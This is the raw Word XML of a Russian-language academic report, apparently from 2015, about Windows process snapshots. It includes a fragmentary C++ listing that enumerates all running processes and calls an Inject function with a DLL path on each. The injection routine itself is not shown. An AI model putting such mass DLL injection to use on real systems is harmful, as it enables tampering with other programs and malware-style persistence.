          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessID</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оментальный снимок из указанных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> процессов, а также кучи, модулей и потоков</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, используемые этими процессами.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8C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WORD</w:t>
      </w:r>
      <w:r w:rsidRPr="001000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wFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">части системы, которые будут включены в снимок. Для получения снимка всех процессов — это параметр должен устанавливаться в </w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TH32CS_SNAPPROCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8C">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessID</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8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ля</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F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wFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TH32CS_SNAPPROCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F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т</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F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аметр</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F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гнорируется</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8C">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если функция завершается успешно, она возвращает открыты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й дескриптор к указанному снимку</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8C">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8C">
      <w:pPr>
        <w:spacing w:after="24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D2F8C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.5.1 Листинг кода инжекции в процессы, полученные в снимке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>hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);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ab/>
        <w:t>if (hProcessSnap == INVALID_HANDLE_VALUE)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ab/>
      </w:r>
      <w:r w:rsidRPr="008D2F8C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ab/>
        <w:t>pe32.dwSize = sizeof(PROCESSENTRY32);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ab/>
        <w:t>do {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ab/>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>if (!Process3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2Next(hProcessSnap, &amp;pe32))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ab/>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>if (Inject(pe32.th32ProcessID, dllPath))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ab/>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>std::cout &lt;&lt; "Injection success:" &lt;&lt; pe32.szExeFile &lt;&lt; std::endl;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ab/>
        <w:t>} whil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="00891D34">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="001000EB" w:rsidRDefault="00E8372C" w:rsidP="00891D34">
      <w:pPr>
        <w:spacing w:after="240"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8D2F8C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_Toc414805630"/>
      <w:r w:rsidRPr="00ED0D64">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="001000EB" w:rsidRDefault="00E8372C" w:rsidP="00E8372C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="001000EB" w:rsidRDefault="00E8372C" w:rsidP="00E8372C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="001000EB" w:rsidRDefault="00E8372C" w:rsidP="00E8372C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Toc414805631"/>
      <w:r w:rsidRPr="00ED0D64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Список</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED0D64">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>литературы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="001000EB" w:rsidRDefault="00E8372C" w:rsidP="00E8372C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="001000EB" w:rsidRDefault="00E8372C" w:rsidP="00E8372C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE39B1" w:rsidRPr="001000EB" w:rsidRDefault="00393818">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00EE39B1" w:rsidRPr="00100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818" w:rsidRDefault="00393818" w:rsidP="00E47FA2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00393818" w:rsidRDefault="00393818" w:rsidP="00E4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818" w:rsidRDefault="00393818" w:rsidP="00E47FA2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00393818" w:rsidRDefault="00393818" w:rsidP="00E4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963B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1C6DF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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="213105F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6692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9C1A0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87C2B4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CC972A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE0A7D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AF50F13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1C6DF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DC"/>
    <w:rsid w:val="000805C5"/>
    <w:rsid w:val="000872BA"/>
    <w:rsid w:val="000B3353"/>
    <w:rsid w:val="000D413B"/>
    <w:rsid w:val="001000EB"/>
    <w:rsid w:val="00205E97"/>
    <w:rsid w:val="00251ACD"/>
    <w:rsid w:val="002B4BB4"/>
    <w:rsid w:val="002B50CE"/>
    <w:rsid w:val="002E7A2E"/>
    <w:rsid w:val="00335965"/>
    <w:rsid w:val="00347FDC"/>
    <w:rsid w:val="00383DC8"/>
    <w:rsid w:val="00393818"/>
    <w:rsid w:val="003E2ED4"/>
    <w:rsid w:val="00403476"/>
    <w:rsid w:val="00430205"/>
    <w:rsid w:val="004C2FC5"/>
    <w:rsid w:val="005155C5"/>
    <w:rsid w:val="00532646"/>
    <w:rsid w:val="00546DFB"/>
    <w:rsid w:val="005478C2"/>
    <w:rsid w:val="00637F4E"/>
    <w:rsid w:val="006A38EE"/>
    <w:rsid w:val="006B3D75"/>
    <w:rsid w:val="006D47FF"/>
    <w:rsid w:val="0070493C"/>
    <w:rsid w:val="00712C5A"/>
    <w:rsid w:val="0072566D"/>
    <w:rsid w:val="00743E0B"/>
    <w:rsid w:val="0077143A"/>
    <w:rsid w:val="00836C5E"/>
    <w:rsid w:val="00891D34"/>
    <w:rsid w:val="008D2F8C"/>
    <w:rsid w:val="008E593B"/>
    <w:rsid w:val="008F6440"/>
    <w:rsid w:val="00921EEF"/>
    <w:rsid w:val="009456B2"/>
    <w:rsid w:val="0095536E"/>
    <w:rsid w:val="00984B5C"/>
    <w:rsid w:val="009C1400"/>
    <w:rsid w:val="00A65973"/>
    <w:rsid w:val="00A9269C"/>
    <w:rsid w:val="00B709E0"/>
    <w:rsid w:val="00BC2E0F"/>
    <w:rsid w:val="00BF2EC8"/>
    <w:rsid w:val="00C203E3"/>
    <w:rsid w:val="00C63D18"/>
    <w:rsid w:val="00C774A0"/>
    <w:rsid w:val="00C8742B"/>
    <w:rsid w:val="00C949A2"/>
    <w:rsid w:val="00CA58F9"/>
    <w:rsid w:val="00DF6EF9"/>
    <w:rsid w:val="00E47FA2"/>
    <w:rsid w:val="00E8372C"/>
    <w:rsid w:val="00EC7BFF"/>
    <w:rsid w:val="00EE0EA0"/>
    <w:rsid w:val="00F75428"/>
    <w:rsid w:val="00F97D6F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423AC-44F7-476A-B0B8-B50D7B80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72C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7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rsid w:val="00E8372C"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Нумерованный первый уровень"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:rsid w:val="00E8372C"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="-284"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E8372C"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00E837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E8372C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styleId="a6">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="005478C2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9C14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140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14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1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14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140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99"/>
    <w:qFormat/>
    <w:rsid w:val="00532646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F6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F64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unhideWhenUsed/>
    <w:rsid w:val="00E47F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47F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47F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5EBD-EFCA-42F8-AB8A-58E6ADD8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8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gins Bilbo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Baggins Bilbo</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-03-22T12:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-19T16:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>